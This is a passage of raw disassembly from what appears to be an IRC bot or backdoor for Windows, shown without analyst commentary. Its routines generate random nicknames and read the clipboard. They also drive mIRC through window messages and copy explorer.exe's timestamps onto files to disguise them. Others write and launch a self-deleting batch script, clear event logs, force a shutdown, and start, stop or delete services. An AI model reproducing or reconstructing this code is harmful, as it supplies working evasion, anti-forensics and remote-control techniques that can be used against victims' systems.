call sub_41B8E2 call sub_41B8E2 cdq mov ecx, 0C0h idiv ecx push off_4382E8[edx*4] loc_417B41: ; CODE XREF: sub_417ADE+48j lea eax, [ebp+var_2C] push eax call sub_41BEB0 pop ecx lea eax, [ebp+var_2C] pop ecx push ebx push esi push edi push eax call sub_41AFE0 pop ecx mov esi, eax push 13h mov [ebp+var_4], esi pop eax sub eax, esi mov [ebp+var_C], eax call sub_41B8E2 mov dword ptr [ebp+var_18+4], eax fild dword ptr [ebp+var_18+4] fmul dbl_4276E8 call sub_41C798 mov ebx, eax call sub_41B8E2 mov dword ptr [ebp+var_18+4], eax fild dword ptr [ebp+var_18+4] fimul [ebp+var_4] fmul dbl_4276E0 call sub_41C798 cmp esi, 2 mov edi, offset a__0 ; "-|`_\\{[]}" jle short loc_417BB4 cmp esi, 3 jnz short loc_417BAB cmp ebx, 1 jz short loc_417BB4 loc_417BAB: ; CODE XREF: sub_417ADE+C6j cmp eax, 1 jnz loc_417C6E loc_417BB4: ; CODE XREF: sub_417ADE+C1j ; sub_417ADE+CBj call sub_41B8E2 mov dword ptr [ebp+var_18+4], eax fild dword ptr [ebp+var_18+4] fmul dbl_4276D8 call sub_41C798 push off_4385E8[eax*4] lea eax, [ebp+var_40] push eax call sub_41BEB0 movsx eax, [ebp+esi+var_2D] lea ebx, [ebp+esi+var_2C] push eax push edi call sub_41BFB0 add esp, 10h test eax, eax jnz short loc_417C5B movsx eax, [ebp+var_40] push eax push edi call sub_41BFB0 pop ecx test eax, eax pop ecx jnz short loc_417C5B call sub_41B8E2 mov dword ptr [ebp+var_18+4], eax dec esi fild dword ptr [ebp+var_18+4] mov dword ptr [ebp+var_18+4], esi fild dword ptr [ebp+var_18+4] fmulp st(1), st fmul dbl_4276E0 call sub_41C798 cmp eax, 1 jnz short loc_417C5B push edi call sub_41AFE0 and dword ptr [ebp+var_18+4], 0 mov dword ptr [ebp+var_18], eax fild [ebp+var_18] pop ecx fstp qword ptr [ebp-8] call sub_41B8E2 mov dword ptr [ebp+var_18+4], eax fild dword ptr [ebp+var_18+4] fmul qword ptr [ebp-8] fmul dbl_4276E0 call sub_41C798 mov al, byte ptr a__0[eax] ; "-|`_\\{[]}" mov [ebx], al loc_417C5B: ; CODE XREF: sub_417ADE+111j ; sub_417ADE+122j ... push [ebp+var_C] lea eax, [ebp+var_40] push eax lea eax, [ebp+var_2C] push eax call sub_41C1E0 add esp, 0Ch loc_417C6E: ; CODE XREF: sub_417ADE+D0j lea eax, [ebp+var_2C] push eax call sub_41AFE0 mov esi, eax movsx eax, [ebp+esi+var_2D] lea ebx, [ebp+esi+var_2C] push eax mov [ebp+var_4], esi call sub_41D648 pop ecx test eax, eax pop ecx jnz loc_417ED6 and [ebp+var_C], eax movsx eax, byte ptr [ebx-1] push eax push edi call sub_41BFB0 pop ecx test eax, eax pop ecx jnz loc_417DCD call sub_41B8E2 mov dword ptr [ebp+var_18+4], eax lea eax, [esi+3] fild dword ptr [ebp+var_18+4] mov dword ptr [ebp+var_18+4], eax fild dword ptr [ebp+var_18+4] fmulp st(1), st fmul dbl_4276E0 call sub_41C798 cmp esi, 3 jz short loc_417CDC cmp eax, 1 jnz loc_417DCD loc_417CDC: ; CODE XREF: sub_417ADE+1F3j push 2 cdq pop ecx idiv ecx cmp edx, 1 jnz short loc_417D1E push edi call sub_41AFE0 and dword ptr [ebp+var_18+4], 0 mov dword ptr [ebp+var_18], eax fild [ebp+var_18] pop ecx fstp qword ptr [ebp-10h] call sub_41B8E2 mov dword ptr [ebp+var_18+4], eax fild dword ptr [ebp+var_18+4] fmul qword ptr [ebp-10h] fmul dbl_4276E0 call sub_41C798 mov al, byte ptr a__0[eax] ; "-|`_\\{[]}" mov [ebx], al jmp short loc_417D3A ; --------------------------------------------------------------------------- loc_417D1E: ; CODE XREF: sub_417ADE+207j call sub_41B8E2 mov dword ptr [ebp+var_18+4], eax fild dword ptr [ebp+var_18+4] fmul dbl_4276D0 call sub_41C798 mov cl, 41h sub cl, al mov [ebx], cl loc_417D3A: ; CODE XREF: sub_417ADE+23Ej push 1 inc esi pop ebx mov [ebp+var_4], esi mov [ebp+var_C], ebx call sub_41B8E2 mov dword ptr [ebp+var_18+4], eax fild dword ptr [ebp+var_18+4] fmul dbl_4276C8 call sub_41C798 cmp esi, 3 jz short loc_417D63 cmp eax, ebx jnz short loc_417DCD loc_417D63: ; CODE XREF: sub_417ADE+27Fj push 2 pop ebx cdq mov ecx, ebx idiv ecx test edx, edx jnz short loc_417DA8 push edi call sub_41AFE0 and dword ptr [ebp+var_18+4], 0 mov dword ptr [ebp+var_18], eax fild [ebp+var_18] pop ecx fstp qword ptr [ebp-10h] call sub_41B8E2 mov dword ptr [ebp+var_18+4], eax fild dword ptr [ebp+var_18+4] fmul qword ptr [ebp-10h] fmul dbl_4276E0 call sub_41C798 mov al, byte ptr a__0[eax] ; "-|`_\\{[]}" mov [ebp+esi+var_2C], al jmp short loc_417DC6 ; --------------------------------------------------------------------------- loc_417DA8: ; CODE XREF: sub_417ADE+28Fj call sub_41B8E2 mov dword ptr [ebp+var_18+4], eax fild dword ptr [ebp+var_18+4] fmul dbl_4276D0 call sub_41C798 mov cl, 41h sub cl, al mov [ebp+esi+var_2C], cl loc_417DC6: ; CODE XREF: sub_417ADE+2C8j inc esi mov [ebp+var_C], ebx mov [ebp+var_4], esi loc_417DCD: ; CODE XREF: sub_417ADE+1C9j ; sub_417ADE+1F8j ... cmp esi, 6 jge loc_417E56 cmp esi, 5 jge short loc_417DEE call sub_41B8E2 mov dword ptr [ebp+var_18+4], eax fild dword ptr [ebp+var_18+4] fmul dbl_4276E8 jmp short loc_417E0C ; --------------------------------------------------------------------------- loc_417DEE: ; CODE XREF: sub_417ADE+2FBj call sub_41B8E2 push 8 mov dword ptr [ebp+var_18+4], eax fild dword ptr [ebp+var_18+4] pop eax sub eax, esi mov dword ptr [ebp+var_18+4], eax fild dword ptr [ebp+var_18+4] fmulp st(1), st fmul dbl_4276E0 loc_417E0C: ; CODE XREF: sub_417ADE+30Ej call sub_41C798 test eax, eax jnz short loc_417E2F call sub_41B8E2 mov dword ptr [ebp+var_18+4], eax fild dword ptr [ebp+var_18+4] fmul dbl_4276C0 call sub_41C798 mov cl, 30h jmp short loc_417E4C ; --------------------------------------------------------------------------- loc_417E2F: ; CODE XREF: sub_417ADE+335j cmp eax, 1 jnz short loc_417E56 call sub_41B8E2 mov dword ptr [ebp+var_18+4], eax fild dword ptr [ebp+var_18+4] fmul dbl_4276D0 call sub_41C798 mov cl, 41h loc_417E4C: ; CODE XREF: sub_417ADE+34Fj sub cl, al mov [ebp+esi+var_2C], cl inc esi mov [ebp+var_4], esi loc_417E56: ; CODE XREF: sub_417ADE+2F2j ; sub_417ADE+354j cmp [ebp+var_C], 2 jge short loc_417ED6 call sub_41B8E2 mov dword ptr [ebp+var_18+4], eax fild dword ptr [ebp+var_18+4] fimul [ebp+var_4] fmul dbl_4276E0 call sub_41C798 cmp eax, 1 jnz short loc_417ED6 call sub_41B8E2 mov dword ptr [ebp+var_18+4], eax fild dword ptr [ebp+var_18+4] fmul dbl_4276C0 call sub_41C798 mov cl, 30h sub cl, al mov [ebp+esi+var_2C], cl call sub_41B8E2 mov dword ptr [ebp+var_18+4], eax fild dword ptr [ebp+var_18+4] fmul dbl_4276B8 call sub_41C798 cmp eax, 1 jnz short loc_417ED6 cmp [ebp+var_C], eax jge short loc_417ED6 call sub_41B8E2 mov dword ptr [ebp+var_18+4], eax fild dword ptr [ebp+var_18+4] fmul dbl_4276B0 call sub_41C798 mov cl, 30h sub cl, al mov [ebp+esi+var_2B], cl loc_417ED6: ; CODE XREF: sub_417ADE+1B1j ; sub_417ADE+37Cj ... lea eax, [ebp+var_2C] push 14h push eax push [ebp+arg_0] call sub_41B5F0 mov eax, [ebp+arg_0] add esp, 0Ch pop edi pop esi pop ebx leave retn sub_417ADE endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_417EEF proc near ; CODE XREF: sub_401ACD+BECp ; sub_401ACD+C29p ... arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp push esi push edi mov edi, [ebp+arg_0] xor esi, esi cmp edi, esi jz short loc_417F7A mov eax, [ebp+arg_4] cmp eax, esi jz short loc_417F7A cmp [ebp+arg_8], esi jz short loc_417F7A cmp byte ptr [eax], 0 jz short loc_417F7A push ebx push edi call sub_426464 mov ebx, eax pop ecx test ebx, ebx jz short loc_417F75 push [ebp+arg_4] push edi call sub_41B900 mov esi, eax pop ecx test esi, esi pop ecx jz short loc_417F6E sub eax, edi push eax push edi push ebx call sub_41B5F0 push [ebp+arg_8] mov eax, ebx sub eax, edi and byte ptr [eax+esi], 0 call sub_41AFE0 push eax push [ebp+arg_8] push ebx call sub_41C1E0 push [ebp+arg_4] call sub_41AFE0 add eax, esi push eax push ebx call sub_41BEC0 push ebx push edi call sub_41BEB0 add esp, 30h mov esi, edi loc_417F6E: ; CODE XREF: sub_417EEF+3Cj push ebx call sub_41B0B1 pop ecx loc_417F75: ; CODE XREF: sub_417EEF+2Bj mov eax, esi pop ebx jmp short loc_417F7C ; --------------------------------------------------------------------------- loc_417F7A: ; CODE XREF: sub_417EEF+Cj ; sub_417EEF+13j ... xor eax, eax loc_417F7C: ; CODE XREF: sub_417EEF+89j pop edi pop esi pop ebp retn sub_417EEF endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_417F80 proc near ; CODE XREF: sub_401955+E9p ; sub_4101FD+F4p var_7D0 = dword ptr -7D0h var_7CC = byte ptr -7CCh arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp sub esp, 7D0h push ebx push esi push 7D0h lea eax, [ebp+var_7D0] push 0 push eax call sub_41B590 mov esi, [ebp+arg_0] push esi call sub_41AFE0 add esp, 10h push 1 pop ebx cmp eax, ebx jge short loc_417FB6 or eax, 0FFFFFFFFh jmp short loc_418029 ; --------------------------------------------------------------------------- loc_417FB6: ; CODE XREF: sub_417F80+2Fj xor ecx, ecx mov [ebp+var_7D0], esi test eax, eax jle short loc_417FD8 loc_417FC2: ; CODE XREF: sub_417F80+56j mov dl, [ecx+esi] cmp dl, 0Ah jz short loc_417FCF cmp dl, 0Dh jnz short loc_417FD3 loc_417FCF: ; CODE XREF: sub_417F80+48j and byte ptr [ecx+esi], 0 loc_417FD3: ; CODE XREF: sub_417F80+4Dj inc ecx cmp ecx, eax jl short loc_417FC2 loc_417FD8: ; CODE XREF: sub_417F80+40j xor edx, edx push edi test eax, eax jle short loc_418009 lea edi, [ebp+var_7CC] loc_417FE5: ; CODE XREF: sub_417F80+87j cmp byte ptr [edx+esi], 0 jnz short loc_418004 cmp byte ptr [edx+esi+1], 0 lea ecx, [edx+esi+1] jz short loc_418004 cmp ebx, 1F4h jge short loc_418009 mov [edi], ecx inc ebx add edi, 4 loc_418004: ; CODE XREF: sub_417F80+69j ; sub_417F80+74j inc edx cmp edx, eax jl short loc_417FE5 loc_418009: ; CODE XREF: sub_417F80+5Dj ; sub_417F80+7Cj cmp [ebp+arg_4], 0 pop edi jz short loc_418027 lea eax, [ebp+var_7D0] push 7D0h push eax push [ebp+arg_4] call sub_41C310 add esp, 0Ch loc_418027: ; CODE XREF: sub_417F80+8Ej mov eax, ebx loc_418029: ; CODE XREF: sub_417F80+34j pop esi pop ebx leave retn sub_417F80 endp ; =============== S U B R O U T I N E ======================================= sub_41802D proc near ; CODE XREF: sub_418087+33p arg_0 = dword ptr 4 arg_4 = dword ptr 8 arg_8 = dword ptr 0Ch mov eax, [esp+arg_4] push esi push edi mov edi, [esp+8+arg_8] mov ecx, 1F4h xor esi, esi rep stosd lea edi, [eax-1] test edi, edi jl short loc_418066 push ebx mov ebx, edi loc_41804A: ; CODE XREF: sub_41802D+36j mov eax, [esp+0Ch+arg_0] mov al, [esi+eax] push eax call sub_418069 pop ecx inc esi mov ecx, [esp+0Ch+arg_8] mov [ecx+eax*4], ebx dec ebx cmp esi, edi jle short loc_41804A pop ebx loc_418066: ; CODE XREF: sub_41802D+18j pop edi pop esi retn sub_41802D endp ; =============== S U B R O U T I N E ======================================= sub_418069 proc near ; CODE XREF: sub_41802D+25p ; sub_418087+6Bp arg_0 = byte ptr 4 movsx eax, [esp+arg_0] push eax call sub_41D74C cmp al, 61h pop ecx jl short loc_418084 cmp al, 7Ah jg short loc_418084 movsx eax, al sub eax, 60h retn ; --------------------------------------------------------------------------- loc_418084: ; CODE XREF: sub_418069+Ej ; sub_418069+12j xor eax, eax retn sub_418069 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_418087 proc near ; CODE XREF: sub_41528E+A0p var_100C = dword ptr -100Ch var_C = dword ptr -0Ch var_8 = dword ptr -8 var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp mov eax, 100Ch call sub_41BB20 push ebx push esi push edi push [ebp+arg_0] call sub_41AFE0 push [ebp+arg_4] mov [ebp+var_4], eax call sub_41AFE0 mov esi, eax lea eax, [ebp+var_100C] push eax push esi push [ebp+arg_4] mov [ebp+var_C], esi call sub_41802D add esp, 14h dec esi mov edi, esi loc_4180C5: ; CODE XREF: sub_418087+B6j test esi, esi jle short loc_418143 mov eax, [ebp+arg_4] movsx eax, byte ptr [esi+eax] push eax call sub_41D74C mov ebx, eax mov eax, [ebp+arg_0] movsx eax, byte ptr [edi+eax] push eax call sub_41D74C pop ecx cmp eax, ebx pop ecx jz short loc_41813B loc_4180EB: ; CODE XREF: sub_418087+B2j mov ebx, [ebp+arg_0] mov al, [edi+ebx] push eax call sub_418069 mov edx, [ebp+var_C] mov eax, [ebp+eax*4+var_100C] pop ecx mov ecx, edx sub ecx, esi cmp ecx, eax jle short loc_41810C mov eax, ecx loc_41810C: ; CODE XREF: sub_418087+81j add edi, eax cmp edi, [ebp+var_4] jge short loc_41813F mov eax, [ebp+arg_4] lea esi, [edx-1] movsx eax, byte ptr [esi+eax] push eax call sub_41D74C mov edx, eax movsx eax, byte ptr [edi+ebx] push eax mov [ebp+var_8], edx call sub_41D74C pop ecx pop ecx mov ecx, [ebp+var_8] cmp eax, ecx jnz short loc_4180EB loc_41813B: ; CODE XREF: sub_418087+62j dec edi dec esi jmp short loc_4180C5 ; --------------------------------------------------------------------------- loc_41813F: ; CODE XREF: sub_418087+8Aj xor eax, eax jmp short loc_418148 ; --------------------------------------------------------------------------- loc_418143: ; CODE XREF: sub_418087+40j mov eax, [ebp+arg_0] add eax, edi loc_418148: ; CODE XREF: sub_418087+BAj pop edi pop esi pop ebx leave retn sub_418087 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41814D proc near ; CODE XREF: sub_401ACD+67A4p ; sub_401ACD+789Fp var_100 = byte ptr -100h arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 100h push esi call dword_42708C ; RtlGetLastWin32Error mov esi, eax push 0 lea eax, [ebp+var_100] push 100h push eax push 400h push esi push 0 push 1200h call dword_427158 ; FormatMessageA lea eax, [ebp+var_100] loc_418186: ; CODE XREF: sub_41814D+46j mov cl, [eax] cmp cl, 1Fh jg short loc_418192 cmp cl, 9 jnz short loc_418195 loc_418192: ; CODE XREF: sub_41814D+3Ej inc eax jmp short loc_418186 ; --------------------------------------------------------------------------- loc_418195: ; CODE XREF: sub_41814D+43j ; sub_41814D+5Bj ... and byte ptr [eax], 0 dec eax lea ecx, [ebp+var_100] cmp eax, ecx jb short loc_4181AF mov cl, [eax] cmp cl, 2Eh jz short loc_418195 cmp cl, 21h jl short loc_418195 loc_4181AF: ; CODE XREF: sub_41814D+54j lea eax, [ebp+var_100] push esi push eax mov esi, offset dword_4DAE0C push [ebp+arg_0] push offset aSErrorSD_ ; "%s Error: %s <%d>." push 200h push esi call sub_41B980 add esp, 18h mov eax, esi pop esi leave retn sub_41814D endp ; =============== S U B R O U T I N E ======================================= sub_4181D7 proc near ; CODE XREF: sub_401ACD+24CBp push esi push 0 call ds:dword_4CB624 ; OpenClipboard test eax, eax jz short loc_41820E push 1 call ds:dword_4CB644 ; GetClipboardData mov esi, eax test esi, esi jz short loc_41820E push edi push esi call dword_427160 ; GlobalLock push esi mov edi, eax call dword_42715C ; GlobalUnlock call ds:dword_4CB6A8 ; CloseClipboard mov eax, edi pop edi pop esi retn ; --------------------------------------------------------------------------- loc_41820E: ; CODE XREF: sub_4181D7+Bj ; sub_4181D7+19j xor eax, eax pop esi retn sub_4181D7 endp ; =============== S U B R O U T I N E ======================================= sub_418212 proc near ; CODE XREF: sub_401ACD+7662p arg_0 = dword ptr 4 push ebp push esi push edi xor esi, esi mov edi, offset aMirc_0 ; "mIRC" push esi push edi call ds:dword_4CB660 ; FindWindowA mov ebp, eax cmp ebp, esi jz short loc_41828E push ebx push edi push 1000h push esi push 4 push esi push 0FFFFFFFFh call dword_42716C ; CreateFileMappingA push esi push esi mov edi, eax push esi push 0F001Fh push edi call dword_427168 ; MapViewOfFile push [esp+10h+arg_0] mov ebx, eax push ebx call sub_41B886 pop ecx pop ecx push esi push 1 push 4C8h push ebp call ds:dword_4CB6B0 ; SendMessageA push esi push 1 push 4C9h push ebp call ds:dword_4CB6B0 ; SendMessageA push ebx call dword_427164 ; UnmapViewOfFile push edi call dword_427068 ; CloseHandle push 1 pop eax pop ebx jmp short loc_418290 ; --------------------------------------------------------------------------- loc_41828E: ; CODE XREF: sub_418212+16j xor eax, eax loc_418290: ; CODE XREF: sub_418212+7Aj pop edi pop esi pop ebp retn sub_418212 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_418294 proc near ; CODE XREF: sub_401221+212p var_11C = byte ptr -11Ch var_18 = byte ptr -18h var_10 = byte ptr -10h var_8 = byte ptr -8 arg_0 = dword ptr 8 push ebp mov ebp, esp sub esp, 11Ch push ebx push esi xor esi, esi push edi lea eax, [ebp+var_11C] push esi push eax push 104h push esi push offset aExplorer_exe ; "explorer.exe" push esi call ds:dword_4CB710 ; SearchPathA test eax, eax jz short loc_418333 mov edi, 80h push esi push edi push 3 push esi mov esi, dword_4270EC push 1 lea eax, [ebp+var_11C] push 80000000h push eax call esi ; CreateFileA mov ebx, eax cmp ebx, 0FFFFFFFFh jz short loc_418333 lea eax, [ebp+var_18] push eax lea eax, [ebp+var_8] push eax lea eax, [ebp+var_10] push eax push ebx call dword_427174 ; GetFileTime push ebx mov ebx, dword_427068 call ebx ; CloseHandle push 0 push edi push 3 push 0 push 2 push 40000000h push [ebp+arg_0] call esi ; CreateFileA mov esi, eax cmp esi, 0FFFFFFFFh jz short loc_418333 lea eax, [ebp+var_18] push eax lea eax, [ebp+var_8] push eax lea eax, [ebp+var_10] push eax push esi call dword_427170 ; SetFileTime push esi call ebx ; CloseHandle loc_418333: ; CODE XREF: sub_418294+2Aj ; sub_418294+51j ... pop edi pop esi pop ebx leave retn sub_418294 endp ; =============== S U B R O U T I N E ======================================= sub_418338 proc near ; CODE XREF: sub_401ACD+16B2p push 1 push offset aSeshutdownpriv ; "SeShutdownPrivilege" call sub_419652 pop ecx pop ecx push 50005h push 6 call ds:dword_4CB594 ; ExitWindowsEx neg eax sbb eax, eax neg eax retn sub_418338 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41835A proc near ; CODE XREF: sub_401ACD+2755p ; sub_4163FA+472p var_764 = byte ptr -764h var_364 = byte ptr -364h var_260 = byte ptr -260h var_15C = byte ptr -15Ch var_58 = dword ptr -58h var_4C = dword ptr -4Ch var_2C = dword ptr -2Ch var_28 = word ptr -28h var_14 = byte ptr -14h var_4 = byte ptr -4 push ebp mov ebp, esp sub esp, 764h push esi xor esi, esi cmp dword_429090, esi push edi jz short loc_41837E cmp ds:dword_4CB724, esi jnz short loc_41837E push esi call sub_401000 pop ecx loc_41837E: ; CODE XREF: sub_41835A+13j ; sub_41835A+1Bj call sub_40B2C0 lea eax, [ebp+var_764] push eax push 400h call dword_4270B0 ; GetTempPathA lea eax, [ebp+var_764] push eax lea eax, [ebp+var_260] push offset aSdel_bat ; "%sdel.bat" push eax call sub_41B886 add esp, 0Ch lea eax, [ebp+var_260] push esi push esi push 2 push esi push esi push 40000000h push eax call dword_4270EC ; CreateFileA mov edi, eax cmp edi, esi jbe loc_4184DE lea eax, [ebp+var_260] push eax lea eax, [ebp+var_764] push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"... push eax call sub_41B886 add esp, 0Ch lea eax, [ebp+var_4] push esi push eax lea eax, [ebp+var_764] push eax call sub_41AFE0 pop ecx push eax lea eax, [ebp+var_764] push eax push edi call dword_4270E0 ; WriteFile push edi call dword_427068 ; CloseHandle push 10h lea eax, [ebp+var_14] push esi push eax call sub_41B590 push 44h lea eax, [ebp+var_58] pop edi push edi push esi push eax call sub_41B590 add esp, 18h mov [ebp+var_58], edi mov edi, 104h lea eax, [ebp+var_15C] push edi push eax push esi mov [ebp+var_4C], offset byte_43D808 mov [ebp+var_2C], 1 mov [ebp+var_28], si call dword_42709C ; GetModuleHandleA push eax call dword_427070 ; GetModuleFileNameA lea eax, [ebp+var_15C] push eax call dword_427098 ; GetFileAttributesA cmp eax, 0FFFFFFFFh jz short loc_418486 lea eax, [ebp+var_15C] push 80h push eax call dword_427094 ; SetFileAttributesA loc_418486: ; CODE XREF: sub_41835A+118j lea eax, [ebp+var_15C] push eax lea eax, [ebp+var_260] push eax lea eax, [ebp+var_764] push offset aComspecCSS ; "%%comspec%% /c %s %s" push eax call sub_41B886 add esp, 10h lea eax, [ebp+var_364] push edi push eax lea eax, [ebp+var_764] push eax call dword_427178 ; ExpandEnvironmentStringsA lea eax, [ebp+var_14] push eax lea eax, [ebp+var_58] push eax push esi push esi push 4008h push 1 push esi lea eax, [ebp+var_364] push esi push eax push esi call dword_42706C ; CreateProcessA loc_4184DE: ; CODE XREF: sub_41835A+72j pop edi pop esi leave retn sub_41835A endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4184E2 proc near ; CODE XREF: sub_401ACD+7233p var_294 = byte ptr -294h var_94 = dword ptr -94h var_84 = dword ptr -84h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp sub esp, 294h push edi xor edi, edi push 94h lea eax, [ebp+var_94] push edi push eax call sub_41B590 add esp, 0Ch lea eax, [ebp+var_94] mov [ebp+var_94], 94h push eax call dword_4270C8 ; GetVersionExA cmp [ebp+var_84], 2 jnz short loc_418578 push [ebp+arg_10] push [ebp+arg_C] call ds:dword_4CB5D4 ; OpenEventLogA push edi push eax call ds:dword_4CB5E4 ; ClearEventLogA test eax, eax jz short loc_41856A push [ebp+arg_10] push offset dword_439074 loc_418543: ; CODE XREF: sub_4184E2+94j lea eax, [ebp+var_294] push eax call sub_41B886 push edi lea eax, [ebp+var_294] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 20h jmp short loc_4185A2 ; --------------------------------------------------------------------------- loc_41856A: ; CODE XREF: sub_4184E2+57j call dword_42708C ; RtlGetLastWin32Error push eax push offset unk_43904C jmp short loc_418543 ; --------------------------------------------------------------------------- loc_418578: ; CODE XREF: sub_4184E2+3Fj lea eax, [ebp+var_294] push offset unk_43901C push eax call sub_41B886 push edi lea eax, [ebp+var_294] push [ebp+arg_8] push eax push [ebp+arg_4] push [ebp+arg_0] call sub_409A73 add esp, 1Ch loc_4185A2: ; CODE XREF: sub_4184E2+86j pop edi leave retn sub_4184E2 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_4185A5 proc near ; CODE XREF: sub_401ACD+55FFp var_1C0 = byte ptr -1C0h var_15C = byte ptr -15Ch var_F8 = byte ptr -0F8h var_94 = dword ptr -94h var_90 = dword ptr -90h var_8C = dword ptr -8Ch var_84 = dword ptr -84h arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h push ebp mov ebp, esp sub esp, 1C0h lea eax, [ebp+var_94] mov [ebp+var_94], 94h push eax call dword_4270C8 ; GetVersionExA cmp [ebp+var_90], 4 jnz short loc_4185FB cmp [ebp+var_8C], 0 jnz short loc_4185E4 push 1 pop eax cmp [ebp+var_84], eax jnz short loc_4185FB leave retn ; --------------------------------------------------------------------------- loc_4185E4: ; CODE XREF: sub_4185A5+30j cmp [ebp+var_8C], 0Ah jz short loc_4185F6 cmp [ebp+var_8C], 5Ah jnz short loc_4185FB loc_4185F6: ; CODE XREF: sub_4185A5+46j push 1 pop eax leave retn ; --------------------------------------------------------------------------- loc_4185FB: ; CODE XREF: sub_4185A5+27j ; sub_4185A5+3Bj ... push esi push edi push offset aNetapi32_dll ; "netapi32.dll" call dword_4270B8 ; LoadLibraryA mov esi, eax push offset aNetmessagebuff ; "NetMessageBufferSend" push esi call dword_4270BC ; GetProcAddress push 32h mov edi, eax push [ebp+arg_0] lea eax, [ebp+var_1C0] push eax call sub_41D834 push 32h lea eax, [ebp+var_15C] push [ebp+arg_4] push eax call sub_41D834 push 32h lea eax, [ebp+var_F8] push [ebp+arg_8] push eax call sub_41D834 lea eax, [ebp+var_F8] push eax call sub_41D817 shl eax, 1 push eax lea eax, [ebp+var_F8] push eax lea eax, [ebp+var_15C] push eax lea eax, [ebp+var_1C0] push eax push 0 call edi ; GetProcessHeap add esp, 3Ch mov edi, eax push esi call dword_427138 ; FreeLibrary mov eax, edi pop edi pop esi leave retn sub_4185A5 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_418685 proc near ; CODE XREF: sub_40111D+F7p ; sub_40E6D9+Ap ... var_4 = dword ptr -4 arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch push ebp mov ebp, esp push ecx push esi call dword_4270A8 ; GetTickCount push eax call sub_41B8D8 pop ecx call sub_41B8E2 mov esi, [ebp+arg_0] mov [ebp+var_4], eax mov eax, [ebp+arg_4] fild [ebp+var_4] sub eax, esi mov [ebp+arg_4], eax fimul [ebp+arg_4] fmul dbl_4276F8 call sub_41C798 sub esi, eax mov eax, esi pop esi leave retn sub_418685 endp ; =============== S U B R O U T I N E ======================================= sub_4186C2 proc near ; CODE XREF: sub_401ACD:loc_406127p arg_0 = dword ptr 4 arg_4 = dword ptr 8 mov eax, [esp+arg_0] push esi push edi mov edi, [esp+8+arg_4] test edi, edi jz short loc_41871A lea esi, [eax+eax*2] push 0 shl esi, 2 push 0 push dword_439098[esi] push edi push eax call sub_41873C add esp, 14h test eax, eax jnz short loc_41870A push edi push off_439094[esi] push offset unk_4391A8 loc_4186FA: ; CODE XREF: sub_4186C2+56j mov esi, offset dword_4DB6D0 push esi call sub_41B886 add esp, 10h jmp short loc_418737 ; --------------------------------------------------------------------------- loc_41870A: ; CODE XREF: sub_4186C2+2Aj push eax call sub_4187DE pop ecx push eax push edi push offset unk_43917C jmp short loc_4186FA ; --------------------------------------------------------------------------- loc_41871A: ; CODE XREF: sub_4186C2+Cj lea eax, [eax+eax*2] mov esi, offset dword_4DB6D0 push off_439090[eax*4] push offset unk_439158 push esi call sub_41B886 add esp, 0Ch loc_418737: ; CODE XREF: sub_4186C2+46j mov eax, esi pop edi pop esi retn sub_4186C2 endp ; =============== S U B R O U T I N E ======================================= ; Attributes: bp-based frame sub_41873C proc near ; CODE XREF: sub_4186C2+20p var_1C = byte ptr -1Ch arg_0 = dword ptr 8 arg_4 = dword ptr 0Ch arg_8 = dword ptr 10h arg_C = dword ptr 14h arg_10 = dword ptr 18h push ebp mov ebp, esp sub esp, 1Ch push ebx push edi xor ebx, ebx push 0F003Fh push ebx push ebx call ds:dword_4CB648 ; OpenSCManagerA mov edi, eax cmp edi, ebx jnz short loc_418763 call dword_42708C ; RtlGetLastWin32Error mov ebx, eax jmp short loc_4187D8 ; --------------------------------------------------------------------------- loc_418763: ; CODE XREF: sub_41873C+1Bj push esi push 0F01FFh push [ebp+arg_4] push edi call ds:dword_4CB530 ; OpenServiceA mov esi, eax cmp esi, ebx jnz short loc_418783 call dword_42708C ; RtlGetLastWin32Error mov ebx, eax jmp short loc_4187D0 ; --------------------------------------------------------------------------- loc_418783: ; CODE XREF: sub_41873C+3Bj mov eax, [ebp+arg_0] cmp eax, 1 jz short loc_4187B6 cmp eax, 3 jz short loc_4187A7 jle short loc_4187C9 cmp eax, 6 jg short loc_4187C9 lea eax, [ebp+var_1C] push eax push [ebp+arg_8] push esi call ds:dword_4CB59C ; ControlService jmp short loc_4187BD ; --------------------------------------------------------------------------- loc_4187A7: ; CODE XREF: sub_41873C+52j push [ebp+arg_10] push [ebp+arg_C] push esi call ds:dword_4CB538 ; StartServiceA jmp short loc_4187BD ; --------------------------------------------------------------------------- loc_4187B6: ; CODE XREF: sub_41873C+4Dj push esi call ds:dword_4CB5A0 ; DeleteService loc_4187BD: ; CODE XREF: sub_41873C+69j ; sub_41873C+78j test eax, eax jnz short loc_4187C9 call dword_42708C ; RtlGetLastWin32Error mov ebx, eax loc_4187C9: ; CODE XREF: sub_41873C+54j ; sub_41873C+59j ... push esi call ds:dword_4CB54C ; CloseServiceHandle loc_4187D0: ; CODE XREF: sub_41873C+45j push edi call ds:dword_4CB54C ; CloseServiceHandle pop esi loc_4187D8: ; CODE XREF: sub_41873C+25j mov eax, ebx pop edi pop ebx leave retn sub_41873C endp ; =============== S U B R O U T I N E ======================================= sub_4187DE proc near ; CODE XREF: sub_4186C2+49p arg_0 = dword ptr 4 mov eax, [esp+arg_0] mov ecx, 420h cmp eax, ecx ja loc_418893 jz loc_41888C add ecx, 0FFFFFFFBh cmp eax, ecx 